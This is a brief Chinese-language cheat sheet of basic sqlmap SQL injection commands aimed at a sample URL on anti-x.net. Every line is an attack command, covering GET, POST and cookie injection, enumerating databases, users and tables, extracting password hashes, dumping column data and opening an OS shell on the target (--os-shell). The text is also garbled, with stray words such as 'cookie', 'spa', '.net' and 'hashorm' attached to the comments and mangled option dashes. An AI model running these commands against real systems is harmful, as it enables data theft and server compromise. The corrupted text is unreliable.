sqlmap幾個基本命令

  • 列幾個基本命令sql

./sqlmap.py –h     //查看幫助信息shell

./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」  //get注入數據庫

./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 --data 「DATA」//post注入cookie

./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 --cookie 「COOKIE」//修改請求時的cookiepost

./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 --dbs   //列數據庫spa

./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 –-users //列用戶.net

./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 –-passwords //獲取密碼hashorm

./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 –-tables  -D DB_NAME //列DB_NAME的表get

./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 –-columns –T TB_NAME -D DB_NAME  //讀取TB_NAME中的列hash

./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //讀字段C1,C2,C3數據

./sqlmap.py –u 「http://www.anti-x.net/inject.asp?id=injecthere」 –-os-shell  //取得一個shell

相關文章
相關標籤/搜索